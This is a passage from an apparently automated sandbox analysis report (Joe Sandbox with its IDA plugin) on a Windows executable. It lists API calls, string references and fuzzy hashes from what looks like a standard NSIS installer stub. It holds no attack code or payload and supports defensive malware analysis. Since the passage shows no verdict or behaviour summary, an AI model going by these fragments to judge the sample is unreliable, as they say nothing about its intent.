                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                      • API String ID: 20674999-2124804629
                                                                                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                      APIs
                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                      • GetSysColor.USER32(?), ref: 004041DB
                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                      • String ID: F$N$open
                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                      APIs
                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                      • wsprintfA.USER32 ref: 00406B79
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                      • API String ID: 565278875-3368763019
                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                      APIs
                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                      • String ID: F
                                                                                                      • API String ID: 941294808-1304234792
                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      Strings
                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                      • API String ID: 1641139501-220328614
                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
APIs
• CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
• GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
• WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
• lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
• WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
• String ID: @bG$RMDir: RemoveDirectory invalid input("")
• API String ID: 3734993849-3206598305
• Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
• Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
• GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
• GlobalFree.KERNEL32(00000000), ref: 00402F17
• CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
• DeleteFileW.KERNEL32(?), ref: 00402F56
Strings
• created uninstaller: %d, "%s", xrefs: 00402F3B
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID: created uninstaller: %d, "%s"
• API String ID: 3294113728-3145124454
• Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
• Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
• Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
• Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• Error registering DLL: %s not found in %s, xrefs: 0040249A
• `G, xrefs: 0040246E
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
• Error registering DLL: Could not load %s, xrefs: 004024DB
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
• API String ID: 1033533793-4193110038
• Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
• Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
• Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
• Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00403E10
• GetSysColor.USER32(00000000), ref: 00403E2C
• SetTextColor.GDI32(?,00000000), ref: 00403E38
• SetBkMode.GDI32(?,?), ref: 00403E44
• GetSysColor.USER32(?), ref: 00403E57
• SetBkColor.GDI32(?,?), ref: 00403E67
• DeleteObject.GDI32(?), ref: 00403E81
• CreateBrushIndirect.GDI32(?), ref: 00403E8B
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
• Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
• Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
• Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: command="%s", xrefs: 00402241
• Exec: failed createprocess ("%s"), xrefs: 004022C2
• Exec: success ("%s"), xrefs: 00402263
Memory Dump Source
• Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
• String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
• API String ID: 2014279497-3433828417
• Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
• Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
• Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
• Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                      Strings
                                                                                                      Memory Dump Source
